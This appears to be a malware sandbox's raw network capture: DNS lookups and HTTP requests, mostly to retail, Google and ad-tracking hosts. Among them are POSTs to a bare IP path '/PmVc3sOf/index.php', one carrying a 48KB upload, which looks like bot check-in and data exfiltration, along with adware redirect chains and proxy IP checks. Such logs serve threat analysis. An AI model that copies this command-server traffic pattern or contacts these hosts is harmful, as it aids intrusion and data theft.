DNScollector-pxu6b0qd2s.px-cloud.netRequestcollector-pxu6b0qd2s.px-cloud.netIN AResponsecollector-pxu6b0qd2s.px-cloud.netIN A35.186.220.184
-
DNSedgedl.me.gvt1.comRequestedgedl.me.gvt1.comIN AResponseedgedl.me.gvt1.comIN A34.104.35.123
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEi5.walmartimages.com.cdn.cloudflare.neti5.walmartimages.com.cdn.cloudflare.netIN A104.18.99.31i5.walmartimages.com.cdn.cloudflare.netIN A104.18.98.31
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEi5.walmartimages.com.cdn.cloudflare.neti5.walmartimages.com.cdn.cloudflare.netIN A104.18.98.31i5.walmartimages.com.cdn.cloudflare.netIN A104.18.99.31
-
GEThttp://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crxRequestGET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
Host: edgedl.me.gvt1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-G925F Build/LMY47X; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/64.0.3282.137 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/215.0.0.45.98;]
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
accept-ranges: bytes
content-disposition: attachment
content-length: 6760942
content-security-policy: default-src 'none'
content-type: application/x-chrome-extension
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 06 Sep 2021 03:06:37 GMT
age: 23829
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400
x-request-id: b8f33d0d-3609-4337-bb25-4d637a2291c5
-
DNSfirebaselogging.googleapis.comRequestfirebaselogging.googleapis.comIN AResponsefirebaselogging.googleapis.comIN A142.251.36.42
-
DNSbeacon.walmart.comRequestbeacon.walmart.comIN AResponsebeacon.walmart.comIN CNAMEbeacon-cdn-custom.walmart.com.akadns.netbeacon-cdn-custom.walmart.com.akadns.netIN CNAMEbeacon-cdn.walmart.com.akadns.netbeacon-cdn.walmart.com.akadns.netIN A52.155.37.126
-
DNS114.t.keepitpumpin.ioRequest114.t.keepitpumpin.ioIN AResponse114.t.keepitpumpin.ioIN A212.83.164.213
-
DNSvarmisende.comRequestvarmisende.comIN AResponse
-
DNSvarmisende.comRequestvarmisende.comIN AResponse
-
DNSvarmisende.comRequestvarmisende.comIN AResponse
-
DNSvarmisende.comRequestvarmisende.comIN AResponse
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
GEThttp://example.org/RequestGET / HTTP/1.1
Host: example.org
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 585681
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Mon, 06 Sep 2021 09:44:03 GMT
Etag: "3147526947+ident"
Expires: Mon, 13 Sep 2021 09:44:03 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (bsa/EB13)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 648
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
DNSupdate.googleapis.comRequestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
DNSb.wal.coRequestb.wal.coIN AResponseb.wal.coIN CNAMEb.wal.co.edgekey.netb.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNScontent-autofill.googleapis.comRequestcontent-autofill.googleapis.comIN AResponsecontent-autofill.googleapis.comIN A142.250.179.202
-
DNSsearchada.comRequestsearchada.comIN AResponsesearchada.comIN CNAMEsucteding-regerson.icusucteding-regerson.icuIN A3.234.28.191
-
DNSfeed.lookbox.netRequestfeed.lookbox.netIN AResponsefeed.lookbox.netIN A104.21.15.206feed.lookbox.netIN A172.67.164.57
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSwww.googletagservices.comRequestwww.googletagservices.comIN AResponsewww.googletagservices.comIN A142.250.179.162
-
DNScas.criteo.comRequestcas.criteo.comIN AResponsecas.criteo.comIN CNAMEcas.par.vip.prod.criteo.comcas.par.vip.prod.criteo.comIN A178.250.0.145
-
DNS115.t.keepitpumpin.ioRequest115.t.keepitpumpin.ioIN AResponse115.t.keepitpumpin.ioIN A212.83.166.214
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSp39-buy.itunes.apple.comRequestp39-buy.itunes.apple.comIN AResponsep39-buy.itunes.apple.comIN CNAMEp39-buy.itunes-apple.com.akadns.netp39-buy.itunes-apple.com.akadns.netIN CNAMEp39-buy-lb.itunes-apple.com.akadns.netp39-buy-lb.itunes-apple.com.akadns.netIN A17.120.252.48
-
DNSsmp-device-content.apple.comRequestsmp-device-content.apple.comIN AResponsesmp-device-content.apple.comIN CNAMEsmp-device-content.apple.com.edgekey.netsmp-device-content.apple.com.edgekey.netIN CNAMEe9959.dsce9.akamaiedge.nete9959.dsce9.akamaiedge.netIN A2.18.102.70
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEz-ljzi-i5-walmartimages-com.speedroute.netz-ljzi-i5-walmartimages-com.speedroute.netIN CNAMEz-walmart-dn2.speedroute.netz-walmart-dn2.speedroute.netIN A148.163.253.36
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSedgedl.me.gvt1.comRequestedgedl.me.gvt1.comIN AResponseedgedl.me.gvt1.comIN A34.104.35.123
-
GEThttp://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crxRequestGET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
Host: edgedl.me.gvt1.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; Moto E (4) Plus Build/NMA26.42-152; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.64 Mobile Safari/537.36 [FB_IAB/FB4A;FBAV/194.0.0.42.99;]
Accept-Encoding: gzip, deflate
ResponseHTTP/1.1 200 OK
accept-ranges: bytes
content-disposition: attachment
content-length: 6760942
content-security-policy: default-src 'none'
content-type: application/x-chrome-extension
etag: "2e2fe7"
last-modified: Wed, 10 Oct 2018 17:49:21 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 06 Sep 2021 00:18:42 GMT
age: 33964
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
cache-control: public,max-age=86400
x-request-id: 1b0f70f6-b638-4a33-b156-184f527aeb91
-
DNS113.t.keepitpumpin.ioRequest113.t.keepitpumpin.ioIN AResponse113.t.keepitpumpin.ioIN A212.83.164.166
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
GEThttp://example.org/RequestGET / HTTP/1.1
Host: example.org
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Age: 338332
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Mon, 06 Sep 2021 09:44:57 GMT
Etag: "3147526947+gzip"
Expires: Mon, 13 Sep 2021 09:44:57 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (bsa/EB1E)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 648
-
DNSpro.ip-api.comRequestpro.ip-api.comIN AResponsepro.ip-api.comIN A208.95.112.2
-
DNSmesu.apple.comRequestmesu.apple.comIN AResponsemesu.apple.comIN CNAMEmesu-cdn.apple.com.akadns.netmesu-cdn.apple.com.akadns.netIN CNAMEmesu-cdn.origin-apple.com.akadns.netmesu-cdn.origin-apple.com.akadns.netIN CNAMEmesu.apple.com.edgekey.netmesu.apple.com.edgekey.netIN CNAMEe1329.g.akamaiedge.nete1329.g.akamaiedge.netIN A2.18.101.56
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEz-ljzi-i5-walmartimages-com.speedroute.netz-ljzi-i5-walmartimages-com.speedroute.netIN CNAMEz-walmart-dn2.speedroute.netz-walmart-dn2.speedroute.netIN A148.163.253.36
-
DNSupdate.googleapis.comRequestupdate.googleapis.comIN AResponseupdate.googleapis.comIN A142.250.179.195
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEe10798.x.akamaiedge.nete10798.x.akamaiedge.netIN A104.73.145.13
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNScollector-pxu6b0qd2s.px-cloud.netRequestcollector-pxu6b0qd2s.px-cloud.netIN AResponsecollector-pxu6b0qd2s.px-cloud.netIN A35.186.220.184
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEi5.walmartimages.com.cdn.cloudflare.neti5.walmartimages.com.cdn.cloudflare.netIN A104.18.98.31i5.walmartimages.com.cdn.cloudflare.netIN A104.18.99.31
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
GEThttp://example.org/RequestGET / HTTP/1.1
Host: example.org
User-Agent: python-requests/2.26.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Accept-Ranges: bytes
Age: 326218
Cache-Control: max-age=604800
Content-Type: text/html; charset=UTF-8
Date: Mon, 06 Sep 2021 09:45:48 GMT
Etag: "3147526947"
Expires: Mon, 13 Sep 2021 09:45:48 GMT
Last-Modified: Thu, 17 Oct 2019 07:18:26 GMT
Server: ECS (bsa/EB24)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 648
-
DNS112.t.keepitpumpin.ioRequest112.t.keepitpumpin.ioIN AResponse112.t.keepitpumpin.ioIN A212.83.164.37
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSexample.orgRequestexample.orgIN AResponseexample.orgIN A93.184.216.34
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEi5.walmartimages.com.cdn.cloudflare.neti5.walmartimages.com.cdn.cloudflare.netIN A104.18.98.31i5.walmartimages.com.cdn.cloudflare.netIN A104.18.99.31
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
POSThttp://185.215.113.202/PmVc3sOf/index.phpRequestPOST /PmVc3sOf/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.202
Content-Length: 83
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:45:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
POSThttp://185.215.113.202/PmVc3sOf/index.php?scr=1RequestPOST /PmVc3sOf/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----2db6c70605a36497764d214c2a7b8347
Host: 185.215.113.202
Content-Length: 48274
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 06 Sep 2021 09:45:57 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: keep-alive
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSmonitor.capmonster.appRequestmonitor.capmonster.appIN AResponsemonitor.capmonster.appIN A104.26.2.167monitor.capmonster.appIN A104.26.3.167monitor.capmonster.appIN A172.67.75.150
-
GEThttp://adcanopus.offerstrack.net/index.php?offer_id=75144&aff_id=1816&aff_sub1=ba7ff32a-017b-1000-ccd9-07321e1f0022&source_id=46_cd08daa5ca3b8984&google_aid=ad9ae425-7b5b-4ad2-984a-db0f29fa39f2&ios_idfa=&app_name=RequestGET /index.php?offer_id=75144&aff_id=1816&aff_sub1=ba7ff32a-017b-1000-ccd9-07321e1f0022&source_id=46_cd08daa5ca3b8984&google_aid=ad9ae425-7b5b-4ad2-984a-db0f29fa39f2&ios_idfa=&app_name= HTTP/1.1
Host: adcanopus.offerstrack.net
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; SM-J327R4 Build/M1AJQ) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: nl-NL,nl;q=0.9,en-GB;q=0.8,en-US;q=0.7,en;q=0.6
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:46:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.2.34
Set-Cookie: 4e4f6b9a8b50ebe5246c4a4af50d12f2=1; expires=Tue, 07-Sep-2021 09:46:00 GMT; Max-Age=86400
Location: https://app.adjust.com/4w2mpsk?adgroup=46_cd08daa5ca3b8984&idfa=&click_id=Q1bjs0ZoRn0iSh040Zu0ictM7p0ry7&gps_adid=ad9ae425-7b5b-4ad2-984a-db0f29fa39f2&android_id=&ip_address=154.61.71.51&campaign_id=75144&affiliate_id=&publisher_id=&impression_id=&subpublisher_id=&campaign={aff_id&install_callback=http%3A%2F%2Fadcanopus.offerstrack.net%2FadvBack.php%3Fclick_id%3DQ1bjs0ZoRn0iSh040Zu0ictM7p0ry7%26adv_id%3D3249&event_callback_ajpf4y=http%3A%2F%2Fadcanopus.offerstrack.net%2FadvBack.php%3Fclick_id%3DQ1bjs0ZoRn0iSh040Zu0ictM7p0ry7%26adv_id%3D3249%26event_id%3D2&event_callback_wqak63=http%3A%2F%2Fadcanopus.offerstrack.net%2FadvBack.php%3Fclick_id%3DQ1bjs0ZoRn0iSh040Zu0ictM7p0ry7%26adv_id%3D3249%26event_id%3D3
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNSi5.wal.coRequesti5.wal.coIN AResponsei5.wal.coIN CNAMEcdn-i5.wal.co.akadns.netcdn-i5.wal.co.akadns.netIN CNAMEi.wal.co.edgekey.neti.wal.co.edgekey.netIN CNAMEe12404.x.akamaiedge.nete12404.x.akamaiedge.netIN A104.73.147.56
-
DNSi5.walmartimages.comRequesti5.walmartimages.comIN AResponsei5.walmartimages.comIN CNAMEi5-cdn.walmartimages.com.akadns.neti5-cdn.walmartimages.com.akadns.netIN CNAMEe10798.x.akamaiedge.nete10798.x.akamaiedge.netIN A104.73.145.13
-
DNSaccounts.google.comRequestaccounts.google.comIN AResponseaccounts.google.comIN A172.217.168.237
-
DNSwww.walmart.comRequestwww.walmart.comIN AResponsewww.walmart.comIN CNAMEwww.walmart.com.edgekey.netwww.walmart.com.edgekey.netIN CNAMEe4373.x.akamaiedge.nete4373.x.akamaiedge.netIN A104.80.225.225
-
DNS110.t.keepitpumpin.ioRequest110.t.keepitpumpin.ioIN AResponse110.t.keepitpumpin.ioIN A163.172.204.15
-
DNSgum.criteo.comRequestgum.criteo.comIN AResponsegum.criteo.comIN CNAMEgum.am5.vip.prod.criteo.comgum.am5.vip.prod.criteo.comIN A178.250.2.146
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:46:06 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSwww.directdexchange.comRequestwww.directdexchange.comIN AResponsewww.directdexchange.comIN CNAMEdirectdexchange.comdirectdexchange.comIN A35.201.70.46
-
GEThttp://www.directdexchange.com/jump/next.php?r=2087215RequestGET /jump/next.php?r=2087215 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.directdexchange.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: openresty
Date: Mon, 06 Sep 2021 09:46:08 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Via: 1.1 google
-
GEThttp://www.directdexchange.com/jump/next.php?stamat=m%7C%2CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbrandom=0.9938497532956096&cbtitle=&cbiframe=0&cbWidth=1280&cbHeight=626&cbdescription=&cbkeywords=&cbref=RequestGET /jump/next.php?stamat=m%7C%2CwI2Z7Y2LqB1dwP0dEdHP3xP.19a%2C2t5FkDDYpjxJXsMWHSh7wKsTFo_9DWdVnHcBDLzDvAWvvhwYRZDYe0ZsowfF7dmW&cbrandom=0.9938497532956096&cbtitle=&cbiframe=0&cbWidth=1280&cbHeight=626&cbdescription=&cbkeywords=&cbref= HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.directdexchange.com/jump/next.php?r=2087215
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.directdexchange.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Mon, 06 Sep 2021 09:46:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
Location: http://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2CgiF2dhJitGU3Bp-GH0dEdHP3xP.a86%2C4UyC1sKXGJjbXT5NLpZah5Zy1eTINX0dIxhkOQlB-7ZY9An7f-C9vKtYnQomciQEdwAu_vR_Ux7nzrj0ek11Tc8i3z4a5sXUtmUSIbNUugSxjjv5i2JJDQDf28RNn3cz3kYe-8WPemzTWSetouVsfy0b5nzw3Y83PpE6q6C9LF69LpHlS8dXvAJvbbNsvBArEyDO1hT-PrL-BDutz_InF-QhDrhWqg8ygSU40yLmaIkm1yTLZONgydTjA88EIhPgK8DJ6jKgbyFYpewJgITcwxUMn8J00EOdqQdmaMz5uriEzz-e3Gj_0NgqDvgoD5raX0S_5knRyG4WwrdGN90GSSefColSL8koNIyA-CIVliEzZ3gzqJAA-hMs3KAYgEDO-A3azWiBVwgP-HLnuMYMZ17ObB2z3QRwUV0sMBoF863uhqWk5R4TXpYit36lGbqem62EKi7zIBePqisu-yMcsDYFj_0e7YYElpRiKJKZJfhRgXn5kXef6s1xydCrjUBn0uyvqK9f_GjUl-c6T6r01Q%2C%2C
Via: 1.1 google
-
GEThttp://www.directdexchange.com/script/i.php?stamat=m%7C%2C%2CgiF2dhJitGU3Bp-GH0dEdHP3xP.a86%2C4UyC1sKXGJjbXT5NLpZah5Zy1eTINX0dIxhkOQlB-7ZY9An7f-C9vKtYnQomciQEdwAu_vR_Ux7nzrj0ek11Tc8i3z4a5sXUtmUSIbNUugSxjjv5i2JJDQDf28RNn3cz3kYe-8WPemzTWSetouVsfy0b5nzw3Y83PpE6q6C9LF69LpHlS8dXvAJvbbNsvBArEyDO1hT-PrL-BDutz_InF-QhDrhWqg8ygSU40yLmaIkm1yTLZONgydTjA88EIhPgK8DJ6jKgbyFYpewJgITcwxUMn8J00EOdqQdmaMz5uriEzz-e3Gj_0NgqDvgoD5raX0S_5knRyG4WwrdGN90GSSefColSL8koNIyA-CIVliEzZ3gzqJAA-hMs3KAYgEDO-A3azWiBVwgP-HLnuMYMZ17ObB2z3QRwUV0sMBoF863uhqWk5R4TXpYit36lGbqem62EKi7zIBePqisu-yMcsDYFj_0e7YYElpRiKJKZJfhRgXn5kXef6s1xydCrjUBn0uyvqK9f_GjUl-c6T6r01Q%2C%2CRequestGET /script/i.php?stamat=m%7C%2C%2CgiF2dhJitGU3Bp-GH0dEdHP3xP.a86%2C4UyC1sKXGJjbXT5NLpZah5Zy1eTINX0dIxhkOQlB-7ZY9An7f-C9vKtYnQomciQEdwAu_vR_Ux7nzrj0ek11Tc8i3z4a5sXUtmUSIbNUugSxjjv5i2JJDQDf28RNn3cz3kYe-8WPemzTWSetouVsfy0b5nzw3Y83PpE6q6C9LF69LpHlS8dXvAJvbbNsvBArEyDO1hT-PrL-BDutz_InF-QhDrhWqg8ygSU40yLmaIkm1yTLZONgydTjA88EIhPgK8DJ6jKgbyFYpewJgITcwxUMn8J00EOdqQdmaMz5uriEzz-e3Gj_0NgqDvgoD5raX0S_5knRyG4WwrdGN90GSSefColSL8koNIyA-CIVliEzZ3gzqJAA-hMs3KAYgEDO-A3azWiBVwgP-HLnuMYMZ17ObB2z3QRwUV0sMBoF863uhqWk5R4TXpYit36lGbqem62EKi7zIBePqisu-yMcsDYFj_0e7YYElpRiKJKZJfhRgXn5kXef6s1xydCrjUBn0uyvqK9f_GjUl-c6T6r01Q%2C%2C HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.directdexchange.com/jump/next.php?r=2087215
Accept-Language: ja-JP
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: www.directdexchange.com
Connection: Keep-Alive
ResponseHTTP/1.1 302 Moved Temporarily
Server: openresty
Date: Mon, 06 Sep 2021 09:46:10 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Access-Control-Allow-Origin: *
Location: https://dist.acweb.online/?c=acwk&subid=16309215702587707187254494197467488&cid=2087215
Referrer-Policy: no-referrer
Via: 1.1 google
-
DNStranslate.googleapis.comRequesttranslate.googleapis.comIN AResponsetranslate.googleapis.comIN A142.250.179.138
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:46:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
